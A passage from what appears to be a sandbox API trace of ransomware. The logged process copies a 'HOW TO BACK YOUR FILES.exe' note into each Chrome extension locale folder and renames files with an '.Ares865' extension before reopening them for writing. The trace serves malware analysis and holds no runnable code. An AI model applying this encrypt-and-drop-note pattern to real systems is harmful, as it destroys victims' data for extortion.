"c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.798] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.798] GetLastError () returned 0x0 [0101.798] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.798] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f07fa0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e73cba0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e73cba0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.798] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.798] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.799] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.799] lstrlenW (lpString="messages.json") returned 13 [0101.799] lstrlenW (lpString="Ares865") returned 7 [0101.799] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.799] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json.Ares865") returned 160 [0101.799] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.800] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.800] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=300) returned 1 [0101.803] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn" [0101.804] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn" [0101.804] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.804] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.804] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.805] GetLastError () returned 0x0 [0101.805] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.805] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f07fa0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e73cba0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e73cba0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.805] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.805] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.805] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.805] lstrlenW (lpString="messages.json") returned 13 [0101.805] lstrlenW (lpString="Ares865") returned 7 [0101.805] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.805] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json.Ares865") returned 160 [0101.805] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.807] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.807] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=451) returned 1 [0101.810] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml" [0101.810] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml" [0101.810] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.810] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.811] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.811] GetLastError () returned 0x0 [0101.811] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.811] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f07fa0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e762d00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e762d00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.812] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.812] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.812] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.812] lstrlenW (lpString="messages.json") returned 13 [0101.812] lstrlenW (lpString="Ares865") returned 7 [0101.812] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.812] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json.Ares865") returned 160 [0101.812] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.813] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.814] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=387) returned 1 [0101.817] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv" [0101.818] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv" [0101.818] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.818] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.818] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.819] GetLastError () returned 0x0 [0101.819] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.819] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f07fa0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e762d00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e762d00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.819] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.819] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.819] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.819] lstrlenW (lpString="messages.json") returned 13 [0101.819] lstrlenW (lpString="Ares865") returned 7 [0101.819] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.819] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json.Ares865") returned 160 [0101.819] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.821] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.821] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=198) returned 1 [0101.824] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt" [0101.825] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt" [0101.825] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.825] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.825] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.826] GetLastError () returned 0x0 [0101.826] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.826] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f07fa0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e762d00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e762d00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.826] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.826] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.826] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.826] lstrlenW (lpString="messages.json") returned 13 [0101.826] lstrlenW (lpString="Ares865") returned 7 [0101.826] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.826] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json.Ares865") returned 160 [0101.826] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.828] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.828] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=213) returned 1 [0101.832] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo" [0101.832] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User 